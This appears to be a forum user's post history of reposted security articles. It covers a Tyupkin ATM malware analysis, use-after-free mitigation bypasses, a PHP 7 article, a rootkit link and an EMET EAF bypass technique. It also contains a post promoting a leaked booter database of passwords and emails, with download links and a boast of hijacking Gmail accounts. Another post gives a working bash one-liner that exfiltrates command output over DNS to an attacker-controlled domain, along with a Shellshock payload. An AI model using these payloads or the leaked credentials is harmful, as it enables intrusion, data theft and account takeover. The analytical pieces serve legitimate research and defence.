Posts: 18772 | Days Won: 729
Everything posted by Nytro
-
Read up, folks, there is more to this world than just XSS.
-
Lizardstresser.su Full SQL DB Leak
Recently LizardSquad's (@LizardMafia) DDoS booter LizardStresser.su had they entire SQL DB leaked! They keep trying to suppress the leak with gay report-cannons and DMCA pulls lol However this leak is wayyyy too fucking juicy to let it not go viral... The SQL DB is filled with login ips, usernames, passwds, emails and even BTC addresses!!!
*Many skids fell for they trick to turn off VPN/Proxy to use the booter so it recorded they real IPs*
*Also many use same passwds for they login as the listed email the signup with... already got into 20+ gmails lol*
All creds for the epic hack go to teh homie nachash (@loldoxbin)
Screenshot: imgur: the simple image sharer
[+] Torrent [+]
https://kickass.so/lizardstresser-su-full-sql-db-leak-t10101482.html
[+] Torrent Magnet [+]
magnet:?xt=urn:btih:DD8AC598B6980F9A275BAF7B0046FF69DDE12AE0
[+] Download Mirrors [+]
https://mega.co.nz/#!m0tgjC5D!edNG37Jna0hiC3N8tzUuAsOL8xKgXyimHTNR4F_BbRE
lizards-full
Sursa: [+] Lizardstresser.su Full SQL DB Leak [+] - Pastebin.com
-
Tyupkin ATM Malware Analysis

Introduction

Some time ago, Kaspersky discovered and reported a new type of malicious program called Tyupkin, which targets ATMs: instead of attacking consumers with card skimmers that steal debit card numbers, it gets cash directly from the ATM without the need for a counterfeit or stolen card. At the heart of the Tyupkin exploitation of ATMs is the simple fact that it requires physical access to the machine. The attacker needs a bootable CD to install the malware in the ATM. Because of this, physical security should be taken seriously into consideration. According to Kaspersky, this malware was active on more than 50 ATMs in Eastern Europe, but judging from VirusTotal submissions, we consider that it has spread to several other countries, including the US, India and China.

Here are the basic steps of how this malware performs its attack:
It is only active at specific times of the night on certain days of the week, between Sunday and Monday, from 1:00 to 5:00.
There is a hidden window running the malware in the background. When the user enters the right key on the keypad, it displays the program interface, then generates a key based on a random seed. Of course, the algorithm responsible for this operation is known only to the authors of the malware, to prevent anyone else from interacting with the ATM.
When the correct key is entered, it leads to the process of dispensing cash.

WOSA/XFS Overview

First and foremost, let me give you a brief overview of the related banking technology. Historically, hardware vendors have taken a proprietary approach, with products and protocols designed purely for their own machines. This has promulgated the usual problems of closed systems: loss of hardware independence, inability to have a mixed vendor implementation, high cost of change, etc. Now, industry-wide standards are being introduced – a move which is creating an open environment and which will have wide-ranging ramifications for the self-service industry. Most prominent amongst these standards is WOSA, which has been developed by Microsoft together with many of the main integrators and hardware vendors. They have taken Microsoft's Windows Open Service Architecture and added Extensions for Financial Services (the XFS part) in order to meet the special requirements of financial applications for access to services and devices. The essence of WOSA is that it allows the seamless integration of Windows applications with services and enterprise capabilities needed by users and developers. It is a family of interfaces which shield users and developers from system complexities and which offer, for instance, standard database access (ODBC) and standard access to messaging services and communication support, including SNA, RPC and Sockets. Each of the elements of WOSA includes a set of Application Program Interfaces (APIs) and Service Provider Interfaces (SPIs) with associated supporting software. WOSA XFS incorporates the definition of a further API and a corresponding set of SPIs. The specification defines a standard set of interfaces such that, for example, an application that uses the API set to communicate with a particular service provider can work, without need for enhancement, with another vendor's service provider, as long as that vendor is WOSA XFS compliant.
Although WOSA XFS defines a general architecture for access to service providers from Windows-based applications, the initial focus has been on providing access to peripheral devices that are unique to financial institutions, such as ATMs. Since these devices are often complex, difficult to manage, and proprietary, the development of a standardized interface to them offers financial institutions immediate gains in productivity and flexibility. WOSA XFS changed its name to simply XFS when the standard was adopted by the international CEN/ISSS standards body. However, it is most commonly called CEN/XFS by industry participants.

As we have seen previously, Payment Systems and Electronic Funds Transfer is a black art, because everything is proprietary. You need to work as an employee of a big vendor (like NCR, Diebold, etc.) or at a financial institution or a bank in order to understand the end-to-end picture. You will not find enough information by just looking for freely available documents and code on the Internet – simply because these standards are not open at all!

Coming back to Tyupkin, this malware uses WOSA/XFS (CEN/XFS), which the different hardware vendors comply with. As far as we can tell, the authors got their hands on manual references that contain detailed information on how to interact with the ATM. We have found XFS specification papers released by CEN, which we will use throughout this analysis to understand the XFS architecture. We have also seen some leaks on the Baidu search engine published by F-Secure, but we are not sure that these were the ones used by the cybercriminals.

WOSA/XFS Architecture

The architecture of the Extensions for Financial Services (XFS) system is shown below: the applications communicate with service providers via the Extensions for Financial Services Manager using the API set. The XFS Manager provides overall management of the XFS subsystem. The XFS Manager is responsible for mapping the API (WFS...) functions to SPI (WFP...) functions, and for calling the appropriate vendor-specific service providers. Note that the calls are always to a local service provider. Each XFS service for each vendor is accessed via a service-specific module called a service provider. For example, vendor A's journal printer is accessed via vendor A's journal printer service provider, and vendor B's receipt printer is accessed via vendor B's receipt printer service provider.

Technical Analysis

SHA256: b670fe2d803705f811b5a0c9e69ccfec3a6c3a31cfd42a30d9e8902af7b9ed80
VirusTotal report here, Cuckoo Sandbox report here.
We are going to use these tools to perform the analysis: DotNet Reflector / RDG Packer Detector / PEBear.
This sample has been compiled with C# (.NET). By looking at the imports/exports, you can see that MSXFS.DLL is the Microsoft DLL which exposes the API and SPI function calls.
After the sample runs, it sleeps for 10 minutes to evade anti-malware tools. Then, it calls InitializeComponent(), which is responsible for setting the right names, fonts, and colors for the different objects of the Form, including the main window. Afterwards, it calls SHGetFolderPath two times to get the System directory as well as the startup directory.
Persistence across reboots is achieved via the registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AptraDebug
It makes a copy of itself in C:\WINDOWS\system32\ulssm.exe. I am not totally sure about this: the strings are obfuscated and I could not decrypt them manually; I tried de4dot but it failed. (A quick check for this persistence key and dropped file is sketched below.)
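As a hedged illustration (not part of the original write-up), a few lines of Python using the standard winreg module can check a Windows ATM host for the AptraDebug Run-key persistence and the dropped ulssm.exe copy described above. The paths come from this analysis; everything else is an assumption and this is a detection sketch, not the malware's own code.

import os
import winreg

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
DROPPED = r"C:\WINDOWS\system32\ulssm.exe"

def check_tyupkin_iocs():
    hits = []
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
            value, _ = winreg.QueryValueEx(key, "AptraDebug")   # persistence entry
            hits.append("Run key AptraDebug -> " + str(value))
    except OSError:
        pass                                                    # key or value absent: no hit
    if os.path.exists(DROPPED):
        hits.append("Dropped file present: " + DROPPED)
    return hits

if __name__ == "__main__":
    for hit in check_tyupkin_iocs():
        print(hit)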
Next, it calls prepareXFSManagerAndOpenServiceProvider. Basically, before an application is allowed to utilize any of the services managed by the XFS subsystem, it must first identify itself to the subsystem. This is accomplished using the WFSStartUp function. An application is only required to perform this function once, regardless of the number of XFS services it utilizes, so this function would typically be called during application initialization. Similarly, the complementary function, WFSCleanUp, is typically called during application shutdown. If an application exits or is shut down without issuing the WFSCleanUp function, the XFS Manager does the cleanup automatically, including the closing of any sessions with service providers that the application has left open. Once a connection between an application and the XFS Manager has successfully been negotiated via WFSStartUp, the application establishes a virtual session with a service provider by issuing a WFSOpen request. Opens are directed towards "logical services" as defined in the XFS configuration. A service handle (hService) is assigned to the session and is used in all calls to the service during the lifetime of the session. Finally, when an application no longer requires the use of a particular service, it issues a WFSClose.

After successfully preparing the XFS service manager, the malware starts two threads; if this fails, it just deletes the binary silently and exits. The TimeInterval thread determines whether the current system time is Sunday or Monday, between 1:00 and 5:00 AM. If the condition is met, this is marked as PIN_PAD_ACTIVE_TIME. The second thread, MainLoop, checks this Boolean field. If the condition is satisfied, it calls waitForMasterKey, which is self-explanatory. Inside this function, it calls WFSExecute with the WFS_CMD_PIN_GET_DATA attribute (0x198). WFSExecute sends a service-specific command to a service provider; here is the prototype that corresponds to this API:

HRESULT WFSExecute (hService, dwCommand, lpCmdData, dwTimeOut, lppResult)

hService is the handle to the service as returned by WFSOpen, and WFS_CMD_PIN_GET_DATA is the command which is used to return keystrokes entered by the user. It will automatically set the PIN pad to echo characters on the display if there is a display. For each keystroke, an execute notification event is sent in order to allow an application to perform the appropriate display action. The third argument is interesting: it is a pointer to a command data structure to be passed to the service provider, and this data structure is defined as follows:

usMaxLen specifies the maximum number of digits which can be returned to the application in the output parameter, which in our case is equal to 10. If bAutoEnd is set to true, the service provider terminates the command when the maximum number of digits is entered. Otherwise, as in our case, the input is terminated by the user using one of the termination keys. When usMaxLen is reached, the service provider will disable all numeric keys. The third and fourth parameters are not important for us. ulTerminateFDKs specifies those FDKs which must terminate the execution of the command. In our case, this value is equal to 0x400, which is the ENTER key:

#define WFS_PIN_FK_ENTER (0x00000400)

Then, it tests whether WFSExecute returned the right value, which is 0; otherwise, when there is an error, it calls prepareXFSManagerAndOpenServiceProvider and the WFSExecute API again.
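To make this call sequence more concrete, here is a minimal Python/ctypes sketch of the WFSExecute call described above. It is an assumption-heavy illustration, not the malware's code: it presumes a Windows ATM host with msxfs.dll present and an already opened PIN service handle, and the WFSPINGETDATA structure is reduced to the fields discussed here rather than the full CEN/XFS layout.

import ctypes
from ctypes import wintypes

WFS_CMD_PIN_GET_DATA = 0x198         # command id used by Tyupkin
WFS_PIN_FK_ENTER     = 0x00000400    # FDK that terminates input

class WFSPINGETDATA(ctypes.Structure):
    # Simplified placeholder for the XFS PIN "get data" command structure.
    _fields_ = [("usMaxLen",        ctypes.c_ushort),  # max digits returned (10 in the sample)
                ("bAutoEnd",        wintypes.BOOL),    # FALSE: the user terminates input
                ("ulActiveFDKs",    ctypes.c_ulong),
                ("ulActiveKeys",    ctypes.c_ulong),
                ("ulTerminateFDKs", ctypes.c_ulong),   # ENTER ends the command
                ("ulTerminateKeys", ctypes.c_ulong)]

msxfs = ctypes.WinDLL("msxfs.dll")   # XFS Manager: exports WFSStartUp/WFSOpen/WFSExecute/...

def wait_for_keys(h_service):
    """Ask the PIN pad service for up to 10 keystrokes, terminated by ENTER."""
    cmd = WFSPINGETDATA(usMaxLen=10, bAutoEnd=False,
                        ulTerminateFDKs=WFS_PIN_FK_ENTER)
    result = ctypes.c_void_p()
    hr = msxfs.WFSExecute(h_service, WFS_CMD_PIN_GET_DATA,
                          ctypes.byref(cmd), 0, ctypes.byref(result))
    return hr                        # 0 means WFS_SUCCESS (see the defines below)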
The relevant status codes are defined as:

#define WFS_SUCCESS (0)
#define WFS_ERR_NOT_STARTED (-39)

Finally, it calls the function scenario(), and depending on which key sequence has been typed on the PIN pad, Tyupkin does the following:

MKEY_CLOSE_AND_ERASE_APP: the corresponding key sequence (333333). Close and delete the program.
MKEY_HIDE_APP: the corresponding key sequence (111111). Hide the application's main screen.
MKEY_EXTEND_TIME: the corresponding key sequence (555555). Modify the time period of the activation of the malware, display "time was extended", then sleep 2 seconds and return -1.
MKEY_SHOW_APP: the corresponding key sequence (22222). Display the main screen of the application, then call PrintCode(), which randomly generates 8 digits and waits for the equivalent session key to be entered according to some algorithm. When the right code is entered, DISPENSE_SESSIOM_ACTIVE is set to True.

After the user enters the cassette number and presses enter, it calls getDecimalNumberFromPINFKDigit to convert the entered number to an integer, then it verifies that it is bigger than 1 and smaller than the total number of cassettes and calls executeDispense, which in turn calls WFSExecute with WFS_CMD_CDM_DISPENSE, then calls getCashUnitInfo, which calls WFSGetInfo (retrieves information from the specified service provider) to get information about each cassette and how much money there is in it.

Conclusion and IOC

As far as I am concerned, we are going to see more cases of ATM malware, because this is where the money is. Targeting financial institutions directly is better for cybercriminals than doing skimming, running RAM scrapers, or doing web injects and ATS stuff. Ploutus malware has been seen before, and Tyupkin is now a concrete weakness in the ATM infrastructure. Also, the fact that many ATMs run unsupported operating systems like Windows XP, and the absence of security solutions, are other problems that need to be addressed urgently. My recommendation for the banks is to review the physical security of their ATMs and their employees (insiders?).

Indicators of compromise:
Check the ATM equipment for the following files:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\AptraDebug.lnk
C:\WINDOWS\system32\ulssm.exe
Check the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AptraDebug

References
http://securelist.com/blog/research/66988/tyupkin-manipulating-atm-machines-with-malware/
http://sourceforge.net/projects/openxfs/
http://www.cen.eu/work/areas/ict/ebusiness/pages/ws-xfs.aspx

By Shaman Vilen | January 19th, 2015
Sursa: http://resources.infosecinstitute.com/tyupkin-atm-malware-analysis/
-
Use-after-Free: New Protections, and how to Defeat them
January 17, 2015 / Jared DeMott

The Problem

Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation where an attacker (a malicious user of an application or network protocol) is able to send some data that is improperly processed by the native computer code. That can lead to important control structure changes that allow the attacker unexpected influence over the path a program will travel. High-level protections, such as anti-virus (AV), have done little to stem the tide. That is because AV is poor at reacting to threats that do not exist in its list of known attacks. Recent low-level operating system (OS) protections have helped. Non-executable memory and code module randomization help prevent attackers from leveraging memory corruption bugs, by stopping injected code from successfully executing. Yet a newer memory corruption exploit variant called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft's anti-ROP add-on called EMET, have helped some. But a particularly troublesome bug class known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (see prior blog HERE). UaFs have been the basis of many recent cyber attacks, including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required.

The Solution

To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely; (2) an attacker knows about this release and quickly fills that space with data they control; and (3) a dangling reference to the original object, which another part of the program assumes is still valid, is used. But of course, unbeknownst to the program, the attacker has changed the object's data. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program. Microsoft chose to tackle this serious UaF problem with two new protections. These protections work together to stop attackers from being able to allocate new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. A heap is a place that a program uses to create/free internal data as needed throughout execution. This new isolated heap houses many internal Internet Explorer objects, while objects likely to be under the influence of attacks (like strings created via JavaScript) are still allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? An obvious weakness with this approach is that, with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects. So Microsoft also created a second, clever protection: Delayed Free, which operates by not releasing an object's memory right away.
In our analogy, if we assume the goal of the naughty kid is to steal the place in line from a good kid who unexpectedly stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while, before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way, even if an attacker knows of an object type on both heaps that could be used to replace the memory backing a dangling reference, they cannot use it, since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are met: there are no references to the object on the stack and there are at least 100,000 bytes waiting to be freed, or the per-thread call stack unwinds fully to its original starting point.

Evaluation

Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it slowed attackers for a season, but before long each mitigation was bypassed by some clever new attack. In my research, I show that one such bypass against these new protections involves using what I call a "long lived" dangling pointer. In my naughty child analogy, we can think of this as the sneaky and patient child who can go to either playground, and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug that involves code maintaining a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references, or the call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a Python script to search the core Internet Explorer code module (called MSHTML.dll). The script finds all the different objects and their sizes, and notes whether each is allocated on the default or the isolated heap. This information can be used to help locate useful objects to attack either heap. And thanks to a memory garbage collection process known as coalescing, the replacement object does not even have to be the same size as the original object. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The Python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE.

Sursa: Use-after-Free: New Protections, and how to Defeat them | Bromium Labs
-
Bash data exfiltration through DNS (using bash builtin functions)

After gaining 'blind' command execution access to a compromised Linux host, data exfiltration can be difficult when the system is protected by a firewall. Sometimes these firewalls prevent the compromised host from establishing connections to the internet. In these cases, data exfiltration through the DNS protocol can be useful, since in a lot of cases DNS queries are not blocked by a firewall. I have had a real-life situation like this, which I will describe later on. There are several oneliners available on the internet to exfiltrate command output through DNS. However, I noticed that these use Linux applications (xxd, od, hexdump, etc.) which are not always present on a minimalistic target system. I decided to create a oneliner which only uses Bash builtin functionality. The oneliner can be used whenever command execution is possible and Bash is installed on the compromised system. I have created the following bash command line, which can be used on the attacked system to execute commands and send the results through DNS:

LINE=`id`; domain="forsec.nl";while read -r -n 1 char;do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53 0>&1;unset var;unset var2

In order to use it, first modify the name servers of your domain so that they point to the IP address of the attacker machine. Two values in the above oneliner also need to be changed: the variable "LINE" needs to contain the command to execute, for example "ls -l /", and the variable "domain" needs to be replaced with the domain which is pointed at your attacker machine. On the attacker machine, the following server-side ruby script can be started: dns.rb. The script will retrieve the output of the executed command. (A minimal Python receiver sketch is included at the end of this post as an alternative.) The following screenshot shows the command executed on a targeted system. This screenshot shows the data retrieved by the attacker, using the dns.rb script. There might be improvements possible to the oneliner and script to make them more efficient, or there might be some cases where the oneliner does not work. Do not hesitate to comment on this blog if you have an improvement.

Real life scenario

I stumbled on a Dell SonicWALL Secure Remote Access (SRA) appliance which was vulnerable to Shellshock. I discovered this by sending the following user-agent, which returned a 200 HTTP response:

User-agent: () { :; }; /bin/ls

When sending a user-agent with a non-existing binary, it returned a 500 HTTP response, which indicates something went wrong (it cannot execute the defined binary):

User-agent: () { :;}; /bin/fake

I was able to execute commands using the Shellshock vulnerability (confirmed by running /bin/sleep 60), however it was not responding with the command output for commands like 'ls'. I discovered that all outgoing connections to the internet were blocked by the machine; only the DNS protocol was allowed, which I confirmed by resolving a hostname using the telnet executable. The appliance did not have any executables like xxd, hexdump, etc. Therefore I decided to create the above line, which does not depend on these utilities, so it can be used on any system containing Bash. Dell is already aware of the Shellshock vulnerability in the older firmware versions of SRA.
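As promised above, here is a hedged, minimal Python equivalent of what the dns.rb receiver needs to do: listen on UDP/53, pull the QNAME labels out of each incoming query, and reassemble the hex chunks sent by the oneliner. The domain and label layout match the oneliner; everything else (no DNS responses are sent, no error handling, output assumed to be printable ASCII) is a simplifying assumption.

import socket

DOMAIN = "forsec.nl"      # must match the `domain` variable in the oneliner
chunks = {}               # offset -> hex chunk

def qname_labels(packet):
    # Decode the QNAME labels of the first question in a raw DNS query packet.
    labels, i = [], 12    # the question section starts after the 12-byte header
    while packet[i] != 0:
        length = packet[i]
        labels.append(packet[i + 1:i + 1 + length].decode("ascii", "replace"))
        i += 1 + length
    return labels

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", 53))                # needs root; the domain's NS must point here
while True:
    data, addr = sock.recvfrom(512)
    labels = qname_labels(data)           # e.g. ['12345', '0', '6C732D6C...', 'forsec', 'nl']
    if labels[-2:] != DOMAIN.split("."):
        continue                          # ignore queries for other domains
    if len(labels) >= 2 and labels[1] == "theend":
        hexdata = "".join(chunk for _, chunk in sorted(chunks.items()))
        print(bytes.fromhex(hexdata).decode("ascii", "replace"))
        chunks.clear()
    elif len(labels) >= 5 and labels[1].isdigit():
        chunks[int(labels[1])] = labels[2]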
More details on how to patch the issue can be found at: https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series Sursa: https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/
-
The PHP 7 Revolution: Return Types and Removed Artifacts
Bruno Skvorc
Published January 16, 2015

With the planned date for PHP 7's release rapidly approaching, the internals group is hard at work trying to fix our beloved language as much as possible by both removing artifacts and adding some long desired features. There are many RFCs we could study and discuss, but in this post, I'd like to focus on three that grabbed my attention.

PHP 5.7 vs PHP 7

As I mentioned in the last newsletter, 5.7 has been downvoted in favor of moving directly to PHP 7. This means there will be no new version between 5.6 and 7 – even if the new version was only to serve as a warning light to those still stuck on outdated code. Originally, 5.7 was not supposed to have new features, but was supposed to throw out notices and warnings of deprecation about code that's about to change in v7. It would also warn about some keywords that are to be reserved in PHP 7, so that people could bring their code up to speed with a sort of "automatic" compatibility checker in the form of an entire PHP version. The thing is, however, as I argue in the newsletter, that most people technologically competent enough to follow PHP in its upgrade path by keeping up with the most recent version aren't generally the type of people to actually be using code that might break in PHP 7. While this is a good discussion to have, what's done is done and the voting is over. What do you think about this?

Return Types

With a vast majority voting "yes", PHP is finally getting return types. The results of the vote are still fresh, but definite. Starting with PHP 7, we'll finally be able to indicate proper return types on functions in the form of:

function foo(): array {
    return [];
}

An improvement? Definitely! But perfect? Unfortunately, no:
the return types can only be what we have for types right now, meaning no scalar values, no return types like string, int, bool, etc. This means that your methods and functions that return such values will still have no declared return type. You can remedy this by returning instances of wrappers for such values, but that's overkill in the vast majority of cases.
no multiple return types. If your function returns either an array or an Iterator object, there's no way to indicate that via, for example, array|Iterator as we do in docblocks.

Some people also complained about the type declaration being after the closing parenthesis of the argument list, rather than before the function name, but to me, this is nitpicking. Popular languages such as modern C++ use the "after" syntax, and as the RFC states, this preserves the possibility of searching for "function foo" without any necessary regex modifications. What's more, this is in line with what HHVM uses, so it's an added unintended compatibility bonus. Others complained about the "strictification" of PHP, but as one commenter states, you really find the value of this when you start coding against interfaces or inheriting other people's code. Besides, as long as it's optional and its existence does not in any way affect PHP's general performance or stability, there's no harm in it. Complaining about it is, to me, akin to complaining about OOP being added to PHP when procedural spaghetti worked so well for most cases back then. Languages evolve, and this is a step in the right direction. What do you think?
Removing Artifacts

The upcoming version proposes to remove PHP4-style constructors (yet to be voted on). You can read what this means in the RFC; it's simple and would be futile to repeat here – but what's actually very interesting is the mental anguish such a move seems to be causing some people. For example, this. "Please do not break our language", pleads Tony, who seems intent on using its broken features. The post is well written despite the obvious anger, but it makes me wonder – if you've kept such a codebase alive for so long, is there really a need to upgrade to PHP 7? And if there is a need to upgrade to PHP 7, is it not easier to simply hunt down the offending classes and fix their constructors? Surely this is something you can delegate to juniors, given enough unit tests in your code base to make sure it all goes well? And if you don't have unit tests, if your app is a mess, do you really hope to benefit in any way from moving to PHP 7? Wouldn't you be better off Modernizing your Application first? The sentence "This means that code which I wrote 10 years ago should still run today, and should still run 10 years from now." is, to me, madness – you definitely and absolutely should not expect this of ANY language across major versions. To draw a parallel from the real world, you shouldn't expect to be allowed to own slaves today just because a law from long ago said you could. Yes, the BC break came after a bloody revolution, but when most slaveowners repented or died, there was peace. Granted, Tony is right in that it would take effort to remove the feature, while it would take none to leave it in. But in the long run, it will take more collective effort to fix the problems these constructors sometimes cause than to remove them right now. Understandably, BC breaks always upset some people, even if major versions are perfectly okay having BC breaks for the purpose of progress. But imagine the fervor when such people find out about this. Heck, imagine what would have happened if WordPress hadn't stepped into 2001 last year and updated to mysqli instead of mysql – either no WP installation would work on PHP 7, or PHP 7 would keep an unsafe and long deprecated feature for the sole reason of keeping WP users happy. My advice to those fearing PHP 7 is – stop. If you don't want to upgrade, don't. If you could be on 5.3 or 5.2 for so long (looking at you, CodeIgniter), you can be on 5.6 for another decade – but let us have modern PHP. Leave progress up to those who are willing to accept it. What say you? Is this removal of artifacts nonsense or needed?

Aside: Extension API Changes

As an interesting sidenote, there are some changes in PHP 7 that might actually cause a bit of a delay with extension porting to version 7. The API for building PHP extensions is still undergoing a revamping (read: cleaning) process and all is subject to change – nonetheless, this provocative tweet from Sara Golemon gathered quite a bit of attention:

"Damn. There are some serious surprises in the PHP7 Extension API changes. Not for nothin', but it's a good time to switch to HHVM." — SaraMG (@SaraMG) January 3, 2015

She basically says the changes in extension development from 5.6 to 7 will be so great, you might as well learn how to make HHVM extensions. She then proceeded to craft a lengthy series on that exact topic, explaining in depth and with examples how to create an HHVM extension. Do you develop extensions? Did you study the changes, or do you feel like it's still too early to tell if they'll have an effect?
Conclusion

As usual, there's no shortage of drama in PHP land. Like all major revolutions throughout history, the PHP 7 revolution will also spill some blood before producing something awesome. PHP 7 is still a long way off, so even if you're caught in the crossfire of musket shots, there's ample time to get to cover. Unless you've been sleeping under tank tracks, in which case there's little either side can do to help you. What do you think of these RFCs? How do you feel about PHP 7 in general? Is it heading in the direction you'd like it to head in? Let us know – we want to hear your thoughts!

Sursa: http://www.sitepoint.com/php-7-revolution-return-types-removed-artifacts/
-
[h=1]FakeMBR[/h]
TDL4-style rootkit to spoof read/write requests to the master boot record. Needs to be compiled with the NTDDK.
See: Using Kernel Rootkits to Conceal Infected MBR | MalwareTech
Link: https://github.com/MalwareTech/FakeMBR/
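For context on what "spoofing read/write requests to the MBR" means in practice, here is a hedged user-mode sketch (Python, Windows, run as administrator) of the kind of read such a rootkit intercepts: a filter driver in the disk stack can return a clean-looking sector here even when the on-disk MBR is infected. This is an illustrative assumption, not code from the FakeMBR project.

# Read the 512-byte MBR of the first physical disk from user mode.
with open(r"\\.\PhysicalDrive0", "rb") as disk:
    mbr = disk.read(512)          # reads from raw devices must be sector-aligned
print("boot signature:", mbr[510:512].hex())   # a valid MBR ends in 55aa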
-
[h=3]Bypassing EMET's EAF Protection: A Slightly Alternative Approach[/h]

A lot of people lately have been talking about EMET, and in particular how to bypass many of the protections and features that it offers. I thought this was an interesting challenge given my background in exploit development, so I decided to devote my dissertation paper to finding out how effective EMET 5.1 is at preventing people from exploiting programs using three different types of exploits. However, a few days ago I hit an interesting problem, and today I would like to share the solution I came up with in the hope that it may be useful to others.

My problem started when I needed to find a way to bypass EAF. For those of you who don't know, EAF is a protection offered as part of EMET's protection suite which prevents exploits from reading the Export Address Table (EAT) by blocking access to the EAT based on the origin of the code. Shellcode often needs to read the EAT in order to find out where the various functions it needs to call are located in memory. Thus, by filtering access to this table, shellcode, including Metasploit shellcode, will be prevented from working; EMET will simply detect the EAF bypass attempt, alert the user, and the program will be closed down. (Please see http://download.microsoft.com/download/A/A/8/AA853FAE-7608-462E-B166-45B0F065BA13/EMET%205.1%20User%20Guide.pdf for more details, in particular page 8.)

There is a way around this, however. As discussed in Aaron Portnoy's "Bypassing All Of The Things" presentation (https://www.exodusintel.com/files/Aaron_Portnoy-Bypassing_All_Of_The_Things.pdf), one can simply obtain the addresses from the Import Address Table (IAT), as discussed in slide 77, rather than the EAT. The IAT contains a list of entries, each of which is a pointer to the actual address of the corresponding function in virtual memory. To take a look at an executable's IAT, we can simply crack open a free version of IDA Pro and wait for IDA to finish examining the entire program. When it's done, simply click on the tab labeled "Imports". You should end up seeing something like this: on the far left we can see the addresses of each of the IAT entries, followed by an ordinal number if there is one (so that the function can be called via its ordinal number rather than via its normal address; Google this if you don't know what I'm talking about, it's a bit beyond this post), the name of the function, and the library it came from.

So we have a way to get the actual address of the functions listed in the IAT, but what if the function you want does not exist as an entry within the IAT? Well, first you need to find an entry that lives in the same library as the function whose address you want. Say I wanted to call ExitProcess, a function located in Kernel32.dll, and I know there is a function ReadFile which is also within Kernel32.dll. There is an entry for ReadFile within the IAT at 0054E1F4. Dereferencing this address will get me the address of ReadFile. Once I have the address of ReadFile I can then take advantage of another trick to get the real address of ExitProcess. You see, because ReadFile and ExitProcess are in the same DLL, they will both share the same base address. These are usually the first 2 bytes of a 32-bit address. Furthermore, all functions are loaded at static offsets from the base address, regardless of how randomized the DLL might be by ASLR etc.
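To illustrate the static-offset claim, here is a hedged Python/ctypes snippet of my own (not from the original post) that resolves two kernel32 exports and prints the distance between them. ctypes is only used as a convenient way to get the addresses that real shellcode would instead read out of the IAT; the delta stays the same across reboots and ASLR rebasing until kernel32.dll itself is updated.

import ctypes

k32 = ctypes.WinDLL("kernel32")

# Addresses of two exports from the same module (what an IAT entry would give us)
read_file    = ctypes.cast(k32.ReadFile,    ctypes.c_void_p).value
exit_process = ctypes.cast(k32.ExitProcess, ctypes.c_void_p).value

offset = exit_process - read_file
print("ReadFile     @ %#x" % read_file)
print("ExitProcess  @ %#x" % exit_process)
print("static delta = %#x" % offset)

# Shellcode-side idea: address of ExitProcess = [IAT entry for ReadFile] + offset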
Because of this, with knowledge of where ReadFile is in memory, I can simply add or subtract the ReadFile-to-ExitProcess offset to the address of ReadFile to get the address of ExitProcess in memory. This offset will never change, even after the machine reboots and the location of Kernel32.dll changes. However, some of you might have noticed a slight problem with this. What if the program doesn't have an IAT entry for any function within the library your desired function is in? That is, you want to call a function located in msvcrt.dll but there are no IAT entries that point to any functions within that library? Well, this is exactly the situation I encountered in the field recently. I wanted to call the function memcpy using the IAT. memcpy is located in msvcrt.dll, however as you can see from the photo below, there is no IAT entry for memcpy. As a matter of fact, there isn't any entry in the IAT for a function that belongs to a library whose name even starts with "m". We're going to have to get a little creative here.

